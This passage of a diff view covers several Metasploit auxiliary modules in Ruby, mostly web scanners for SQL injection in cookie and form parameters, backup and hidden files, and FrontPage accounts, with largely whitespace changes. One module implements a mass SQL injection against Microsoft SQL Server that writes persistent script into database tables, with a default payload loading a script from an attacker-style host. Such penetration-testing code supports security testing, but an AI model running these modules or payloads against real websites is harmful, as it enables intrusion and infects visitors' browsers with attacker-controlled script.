}, 20)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
if testres
@ -278,15 +278,15 @@ class Metasploit3 < Msf::Auxiliary
found = true
inje = estr
dbt = dbtype
injt = injtype
injt = injtype
end
end
if found
print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})")
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}")
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}")
print_status("[#{wmap_target_host}] Vuln data parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'")
report_note(
:host => ip,
:proto => 'HTTP',
@ -294,39 +294,39 @@ class Metasploit3 < Msf::Auxiliary
:type => 'SQL_INJECTION',
:data => "#{datastore['PATH']} Location: DATA Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}"
)
break
end
else
print_error("[#{wmap_target_host}] No response")
print_error("[#{wmap_target_host}] No response")
return
end
end
end
end
end
end
end
#
# Test COOKIE parameters
#
found = false
if datastore['COOKIE']
sqlinj.each do |istr,idesc|
if found
break
if found
break
end
cvars.each do |key,value|
cvars.each do |key,value|
cvars = queryparse(datastore['COOKIE']) #Now its a Hash
if !datastore['NoDetailMessages']
print_status("- Testing cookie with #{idesc}. Parameter #{key}:")
print_status("- Testing cookie with #{idesc}. Parameter #{key}:")
end
cvars[key] = cvars[key]+istr
cvarstr = ""
cvars.each do |tkey,tvalue|
if cvarstr
@ -334,19 +334,19 @@ class Metasploit3 < Msf::Auxiliary
end
cvarstr << tkey+'='+tvalue
end
begin
testres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => cvarstr,
'data' => datastore['DATA']
}, 20)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
if testres
@ -355,15 +355,15 @@ class Metasploit3 < Msf::Auxiliary
found = true
inje = estr
dbt = dbtype
injt = injtype
injt = injtype
end
end
if found
print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})")
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}")
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}")
print_status("[#{wmap_target_host}] Vuln cookie parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'")
report_note(
:host => ip,
:proto => 'HTTP',
@ -371,15 +371,15 @@ class Metasploit3 < Msf::Auxiliary
:type => 'SQL_INJECTION',
:data => "#{datastore['PATH']} Location: COOKIE Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}"
)
break
end
else
print_error("[#{wmap_target_host}] No response")
print_error("[#{wmap_target_host}] No response")
return
end
end
end
end
end
end
end
end
end
end

View File

@ -1,6 +1,9 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,31 +21,31 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP File Same Name Directory Scanner',
'Description' => %q{
This module identifies the existence of files
in a given directory path named as the same name of the
This module identifies the existence of files
in a given directory path named as the same name of the
directory.
Only works if PATH is differenet than '/'.
Only works if PATH is differenet than '/'.
},
'Author' => [ 'et [at] metasploit.com' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('PATH', [ true, "The directory path to identify files", '/']),
OptString.new('EXT', [ true, "File extension to use", '.aspx'])
], self.class)
], self.class)
end
def run_host(ip)
extensions = [
'.null',
extensions = [
'.null',
'.backup',
'.bak',
'.c',
@ -53,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
'.html',
'.htm',
'.log',
'.old',
'.old',
'.orig',
'.tar',
'.tar.gz',
@ -66,20 +69,20 @@ class Metasploit3 < Msf::Auxiliary
]
tpath = datastore['PATH']
if tpath.eql? "/"||""
print_error("Blank or default PATH set.");
return
end
if tpath[-1,1] != '/'
tpath += '/'
end
end
testf = tpath.split('/').last
extensions << datastore['EXT']
extensions.each { |ext|
begin
testfext = testf.chomp + ext
@ -89,9 +92,9 @@ class Metasploit3 < Msf::Auxiliary
'ctype' => 'text/plain'
}, 20)
if (res and res.code >= 200 and res.code < 300)
if (res and res.code >= 200 and res.code < 300)
print_status("Found #{wmap_base_url}#{tpath}#{testfext}")
report_note(
:host => ip,
:proto => 'HTTP',
@ -99,16 +102,16 @@ class Metasploit3 < Msf::Auxiliary
:type => 'FILE',
:data => "#{tpath}#{testfext} Code: #{res.code}"
)
else
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext}")
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
}
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -21,65 +21,65 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP Interesting File Scanner',
'Description' => %q{
This module identifies the existence of interesting files
in a given directory path.
This module identifies the existence of interesting files
in a given directory path.
},
'Author' => [ 'et' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('PATH', [ true, "The path to identify files", '/']),
OptString.new('EXT', [ false, "Append file extension to use", '']),
OptPath.new('DICTIONARY', [ false, "Path of word dictionary to use",
OptPath.new('DICTIONARY', [ false, "Path of word dictionary to use",
File.join(Msf::Config.install_root, "data", "wmap", "wmap_files.txt")
]
)
], self.class)
], self.class)
register_advanced_options(
[
OptInt.new('ErrorCode', [ true, "The expected http code for non existant files", 404]),
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt")
]
),
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ]),
OptInt.new('TestThreads', [ true, "Number of test threads", 25])
], self.class)
], self.class)
end
def run_host(ip)
conn = false
tpath = datastore['PATH']
tpath = datastore['PATH']
if tpath[-1,1] != '/'
tpath += '/'
end
nt = datastore['TestThreads'].to_i
nt = 1 if nt == 0
dm = datastore['NoDetailMessages']
queue = []
File.open(datastore['DICTIONARY']).each do |testf|
queue << testf.strip
end
end
#
# Detect error code
#
ecode = datastore['ErrorCode'].to_i
#
ecode = datastore['ErrorCode'].to_i
begin
randfile = Rex::Text.rand_text_alpha(5).chomp
res = send_request_cgi({
'uri' => tpath+randfile+ datastore['EXT'],
'method' => 'GET',
@ -87,8 +87,8 @@ class Metasploit3 < Msf::Auxiliary
}, 20)
return if not res
tcode = res.code.to_i
tcode = res.code.to_i
# Look for a string we can signature on as well
if(tcode >= 200 and tcode <= 299)
@ -109,37 +109,37 @@ class Metasploit3 < Msf::Auxiliary
ecode = tcode
print_status("Using code '#{ecode}' as not found.")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
conn = false
rescue ::Timeout::Error, ::Errno::EPIPE
end
conn = false
rescue ::Timeout::Error, ::Errno::EPIPE
end
while(not queue.empty?)
t = []
1.upto(nt) do
1.upto(nt) do
t << Thread.new(queue.shift) do |testf|
Thread.current.kill if not testf
testfext = testf.chomp + datastore['EXT']
res = send_request_cgi({
'uri' => tpath+testfext,
'method' => 'GET',
'ctype' => 'text/plain'
}, 20)
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
if dm == false
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
#blah
end
else
if res.code.to_i == 400 and ecode != 400
print_error("Server returned an error code. #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
if res.code.to_i == 400 and ecode != 400
print_error("Server returned an error code. #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
else
print_status("Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
report_note(
:host => ip,
:proto => 'HTTP',
@ -147,8 +147,8 @@ class Metasploit3 < Msf::Auxiliary
:type => 'FILE',
:data => "#{tpath}#{testfext} Code: #{res.code}"
)
end
end
end
end
end

View File

@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -45,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
end
info = (datastore['SSL'] ? "https" : "http") + "://#{target_host}#{port}/"
connect
sock.put("GET /_vti_inf.html HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" + "Keep-Alive: 300\r\n" +
@ -77,27 +81,27 @@ class Metasploit3 < Msf::Auxiliary
def check_account(info, fpversion, target_host)
return if not fpversion
return if not fpversion
connect
# http://msdn2.microsoft.com/en-us/library/ms454298.aspx
# http://msdn2.microsoft.com/en-us/library/ms454298.aspx
method = "method=open+service:#{fpversion}&service_name=/"
req = "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" +
"Keep-Alive: 300\r\n" + "Connection: Keep-Alive, TE\r\n" + "Host: #{target_host}\r\n" +
req = "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" +
"Keep-Alive: 300\r\n" + "Connection: Keep-Alive, TE\r\n" + "Host: #{target_host}\r\n" +
"User-Agent: " + datastore['UserAgent'] + "\r\n" + "Content-Type: application/x-www-form-urlencoded\r\n" +
"Content-Length: #{method.length}\r\n\r\n" + method + "\r\n\r\n"
"Content-Length: #{method.length}\r\n\r\n" + method + "\r\n\r\n"
sock.put(req)
res = sock.get_once
if(res and res.match(/^HTTP\/1\.[01]\s+([^\s]+)\s+(.*)/))
retcode = $1
retmsg = $2.strip
if(retcode == "100")
res = sock.get_once
if(res and res.match(/^HTTP\/1\.[01]\s+([^\s]+)\s+(.*)/))
@ -122,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("#{info} FrontPage Unknown Response [#{retcode}]")
end
end
disconnect
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -22,17 +22,17 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP Microsoft SQL Injection Table XSS Infection',
'Description' => %q{
This module implements the mass SQL injection attack in
This module implements the mass SQL injection attack in
use lately by concatenation of HTML string that forces a persistant
XSS attack to redirect user browser to a attacker controller website.
},
'Author' => [ 'et' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('URI', [ true, "The path/file to identify backups", '/index.asp']),
@ -40,17 +40,17 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('VULN_PAR', [ true, "Vulnerable parameter name", 'p1']),
OptBool.new('TEXT_INT_INJECTION', [ true, "Perform string injection", false]),
OptBool.new('COMMENTED', [ true, "Comment end of query", true]),
OptString.new('EVIL_HTML', [ true, "Evil HTML to add to tables", '<script src=http://browser-autopwn.com/evilscript.js></script>']),
], self.class)
OptString.new('EVIL_HTML', [ true, "Evil HTML to add to tables", '<script src=http://browser-autopwn.com/evilscript.js></script>']),
], self.class)
end
def wmap_enabled
false
end
end
def run_host(ip)
#Weird to indent for practical reasons.
infstr = %Q{
DECLARE @T varchar(255),@C varchar(255)
@ -71,36 +71,36 @@ DECLARE @T varchar(255),@C varchar(255)
prestr = ";DECLARE @S NVARCHAR(4000);SET @S=CAST("
poststr = " AS NVARCHAR(4000));EXEC(@S);"
gvars = queryparse(datastore['QUERY']) #Now its a Hash
if gvars.has_key?(datastore['VULN_PAR'])
prestr = datastore['TEXT_INT_INJECTION'] ? "\'#{prestr}" : nil
poststr = datastore['COMMENTED'] ? "#{poststr}--" : nil
attstr = ""
infstr.unpack("C*").collect! { |i| attstr += i.to_s(base=16).upcase+"00" }
attstr = ""
infstr.unpack("C*").collect! { |i| attstr += i.to_s(base=16).upcase+"00" }
gvars[datastore['VULN_PAR']] += prestr + "0x"+attstr + poststr
else
else
print_status("Error: Vulnerable parameter is not part of the supplied query string.")
return
end
begin
normalres = send_request_cgi({
'uri' => datastore['URI'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => 'GET',
'ctype' => 'text/plain'
}, 20)
rescue ::Rex::ConnectionError
rescue ::Errno::EPIPE
rescue ::Errno::EPIPE
end
print_status("Request sent.")
print_status("Request sent.")
end
end

View File

@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,27 +21,27 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP Previous Directory File Scanner',
'Description' => %q{
This module identifies files in the first parent directory with same name as
the given directory path. Example: Test /backup/files/ will look for the
following files /backup/files.ext .
following files /backup/files.ext .
},
'Author' => [ 'et [at] metasploit.com' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('PATH', [ true, "The test path. The default value will not work.", '/'])
], self.class)
], self.class)
end
def run_host(ip)
extensions = [
'.null',
extensions = [
'.null',
'.backup',
'.bak',
'.c',
@ -49,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
'.htm',
'.jar',
'.log',
'.old',
'.old',
'.orig',
'.o',
'.tar',
@ -63,18 +67,18 @@ class Metasploit3 < Msf::Auxiliary
]
tpath = datastore['PATH']
if tpath.eql? "/"||""
print_error("Blank or default PATH set.");
return
end
if tpath[-1,1] != '/'
tpath += '/'
end
end
extensions << datastore['EXT']
extensions.each { |ext|
begin
testf = tpath.chop+ext
@ -85,9 +89,9 @@ class Metasploit3 < Msf::Auxiliary
'ctype' => 'text/plain'
}, 20)
if (res and res.code >= 200 and res.code < 300)
if (res and res.code >= 200 and res.code < 300)
print_status("Found #{wmap_base_url}#{testf}")
report_note(
:host => ip,
:proto => 'HTTP',
@ -95,16 +99,16 @@ class Metasploit3 < Msf::Auxiliary
:type => 'FILE',
:data => "#{testf} Code: #{res.code}"
)
else
print_status("NOT Found #{wmap_base_url}#{testf}")
print_status("NOT Found #{wmap_base_url}#{testf}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
}
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -23,42 +23,42 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP File Extension Scanner',
'Description' => %q{
This module identifies the existence of additional files
This module identifies the existence of additional files
by modifying the extension of an existing file.
},
'Author' => [ 'et [at] cyberspace.org' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('PATH', [ true, "The path/file to identify additional files", '/default.asp']),
OptString.new('EXT', [ false, "File extension to replace (blank for automatic replacement of extension)", '']),
OptString.new('EXT', [ false, "File extension to replace (blank for automatic replacement of extension)", '']),
], self.class)
register_advanced_options(
[
OptInt.new('ErrorCode', [ true, "The expected http code for non existant files", 404]),
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt")
]
),
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
], self.class)
], self.class)
end
def run_host(ip)
conn = false
dm = datastore['NoDetailMessages']
extensions= [
'bak',
'txt',
@ -72,19 +72,19 @@ class Metasploit3 < Msf::Auxiliary
tpathfile = Pathname.new(datastore['PATH'])
tpathnoext = tpathfile.to_s[0..datastore['PATH'].rindex(tpathfile.extname)]
extensions.each { |testext|
#
# Detect error code. This module is a special case as each extension
# usually is handled diferently by the server with different error codes
#
ecode = datastore['ErrorCode'].to_i
# usually is handled diferently by the server with different error codes
#
ecode = datastore['ErrorCode'].to_i
begin
randchars = Rex::Text.rand_text_alpha(3).chomp
tpath = tpathnoext+randchars+testext
res = send_request_cgi({
'uri' => tpath,
'method' => 'GET',
@ -92,14 +92,14 @@ class Metasploit3 < Msf::Auxiliary
}, 20)
return if not res
tcode = res.code.to_i
tcode = res.code.to_i
emesg = ""
# Look for a string we can signature on as well
if(tcode >= 200 and tcode <= 299)
File.open(datastore['HTTP404Sigs']).each do |str|
if(res.body.index(str))
emesg = str
@ -117,14 +117,14 @@ class Metasploit3 < Msf::Auxiliary
ecode = tcode
print_status("Using code '#{ecode}' as not found.")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
conn = false
rescue ::Timeout::Error, ::Errno::EPIPE
conn = false
rescue ::Timeout::Error, ::Errno::EPIPE
end
#if not conn return
begin
tpath = tpathnoext+testext
res = send_request_cgi({
@ -132,18 +132,18 @@ class Metasploit3 < Msf::Auxiliary
'method' => 'GET',
'ctype' => 'text/plain'
}, 20)
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
if dm == false
print_status("NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}")
print_status("NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}")
#blah
end
else
if res.code.to_i == 400 and ecode != 400
print_error("Server returned an error code. #{wmap_base_url}#{tpath} #{res.code.to_i}")
if res.code.to_i == 400 and ecode != 400
print_error("Server returned an error code. #{wmap_base_url}#{tpath} #{res.code.to_i}")
else
print_status("Found #{wmap_base_url}#{tpath}")
report_note(
:host => ip,
:proto => 'HTTP',
@ -151,14 +151,14 @@ class Metasploit3 < Msf::Auxiliary
:type => 'FILE',
:data => "#{tpath} Code: #{res.code}"
)
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
rescue ::Timeout::Error, ::Errno::EPIPE
end
}
end
end

Some files were not shown because too many files have changed in this diff Show More